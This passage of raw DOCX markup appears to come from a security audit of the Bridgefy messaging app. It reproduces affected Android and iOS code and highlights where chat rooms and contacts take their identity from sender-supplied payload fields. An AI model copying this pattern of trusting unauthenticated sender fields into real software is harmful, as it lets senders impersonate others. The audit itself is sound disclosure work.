        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|| chatRoom.chatRoomName != payload.senderName) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>chatRoom.chatRoomAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>chatRoom.chatRoomName = payload.senderName</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoomRepository.updateChatRoom(chatRoom)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="3329" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoom = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ChatRoomEntity(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="3428" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="3230" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2303" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, payload.message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload.status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageStatus.STATUS_RECEIVED.ordinal, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MESSAGE_RECEIVED,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="4643" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System.currentTimeMillis(), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoomRepository.createChatRoom(chatRoom)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>saveNewDirectMessageReceived(messageId, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/Bridgefy/MessageManager/MessageManager.swift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1440" w:right="585" w:hanging="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>insertMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(message:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessagePayload,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>deliveryType:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DeliveryType)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>guard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageModel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.containMessage(fromUUID: message.uuid,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="4876" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: config.context) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="0" w:right="9" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contact = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ContactModel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.fetch(withID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>message.payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2735" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>config.context),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2160" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contact.isBlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contact = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Contact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(id: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message.payload.senderId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="4320" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>displayName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
